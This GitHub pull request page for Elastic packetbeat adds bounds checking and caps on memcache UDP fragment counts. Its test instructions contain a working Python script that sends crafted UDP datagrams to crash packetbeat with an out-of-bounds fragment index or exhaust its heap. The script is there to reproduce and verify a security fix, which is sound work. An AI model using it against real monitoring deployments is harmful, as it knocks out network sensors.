Skip to content

[packetbeat] memcache udp bounds checking #47874

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 6 commits into
base: main
Choose a base branch
from
Open

[packetbeat] memcache udp bounds checking #47874

wants to merge 6 commits into from
+174 −10

Conversation

@nicholasberlin
Copy link
Contributor

@nicholasberlin nicholasberlin commented Dec 2, 2025
edited
Loading

Proposed commit message

packetbeat: verify and cap memcache udp fragment counts

Checklist

  • My code follows the style guidelines of this project
  • I have commented my code, particularly in hard-to-understand areas
  • I have made corresponding changes to the documentation
  • I have made corresponding change to the default configuration files
  • I have added tests that prove my fix is effective or that my feature works. Where relevant, I have used the stresstest.sh script to run them under stress conditions and race detector to verify their stability.
  • I have added an entry in ./changelog/fragments using the changelog tool.

How to test this PR locally

  1. Compile packetbeat
cd /opt/beats
go build -C packetbeat -o /usr/local/bin/packetbeat
  1. Run packetbeat
packetbeat -e -c packetbeat_memcache_udp.yml
  1. Run the following script to trigger the issue:
#!/usr/bin/env python3
"""Send crafted memcache UDP datagrams to trigger Packetbeat bugs."""
import argparse
import socket
import struct
import time


def send_crash(sock, host, port):
    # requestID=0x4242, seqNumber=5, numDatagrams=2 -> out-of-bounds
    header = struct.pack(
        ">HHHH",
        0x4242,  # requestID
        5,       # seqNumber > numDatagrams
        2,       # numDatagrams
        0,
    )
    sock.sendto(header + b"A", (host, port))


def send_spray(sock, host, port, count):
    header = struct.pack(
        ">HHHH",
        0x5151,
        0,
        65535,
        0,
    )
    payload = b"B"
    for i in range(count):
        sock.sendto(header + payload, (host, port))
        time.sleep(0.05)


def main():
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("--host", default="127.0.0.1")
    parser.add_argument("--port", default=11211, type=int)
    parser.add_argument(
        "--mode",
        choices=["panic", "spray"],
        default="panic",
        help="panic sends OOB fragment index; spray exhausts heap",
    )
    parser.add_argument(
        "--spray-count",
        type=int,
        default=10,
        help="number of allocations to attempt in spray mode",
    )
    args = parser.parse_args()

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        if args.mode == "panic":
            send_crash(sock, args.host, args.port)
        else:
            send_spray(sock, args.host, args.port, args.spray_count)
    finally:
        sock.close()


if __name__ == "__main__":
    main()

python3 scripts/trigger_memcache_udp.py --mode panic

@nicholasberlin nicholasberlin requested a review from a team as a code owner December 2, 2025 21:27
@botelastic botelastic bot added the needs_team Indicates that the issue/PR needs a Team:* label label Dec 2, 2025
@github-actions
Copy link
Contributor

github-actions bot commented Dec 2, 2025

🤖 GitHub comments

Just comment with:

  • run docs-build : Re-trigger the docs validation. (use unformatted text in the comment!)

@mergify
Copy link
Contributor

mergify bot commented Dec 2, 2025

This pull request does not have a backport label.
If this is a bug or security fix, could you label this PR @nicholasberlin? 🙏.
For such, you'll need to label your PR with:

  • The upcoming major version of the Elastic Stack
  • The upcoming minor version of the Elastic Stack (if you're not pushing a breaking change)

To fixup this pull request, you need to add the backport labels for the needed
branches, such as:

  • backport-8./d is the label to automatically backport to the 8./d branch. /d is the digit
  • backport-active-all is the label that automatically backports to all active branches.
  • backport-active-8 is the label that automatically backports to all active minor branches for the 8 major.
  • backport-active-9 is the label that automatically backports to all active minor branches for the 9 major.

@nicholasberlin nicholasberlin added the Team:Security-Linux Platform Linux Platform Team in Security Solution label Dec 2, 2025
@botelastic botelastic bot removed the needs_team Indicates that the issue/PR needs a Team:* label label Dec 2, 2025
@elasticmachine
Copy link
Contributor

elasticmachine commented Dec 2, 2025

Pinging @elastic/sec-linux-platform (Team:Security-Linux Platform)

@nicholasberlin nicholasberlin added backport-8.19 Automated backport to the 8.19 branch backport-9.1 Automated backport to the 9.1 branch backport-9.2 Automated backport to the 9.2 branch labels Dec 2, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

@nicholasberlin nicholasberlin

Labels

backport-8.19 Automated backport to the 8.19 branch backport-9.1 Automated backport to the 9.1 branch backport-9.2 Automated backport to the 9.2 branch bug Team:Security-Linux Platform Linux Platform Team in Security Solution

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@nicholasberlin @elasticmachine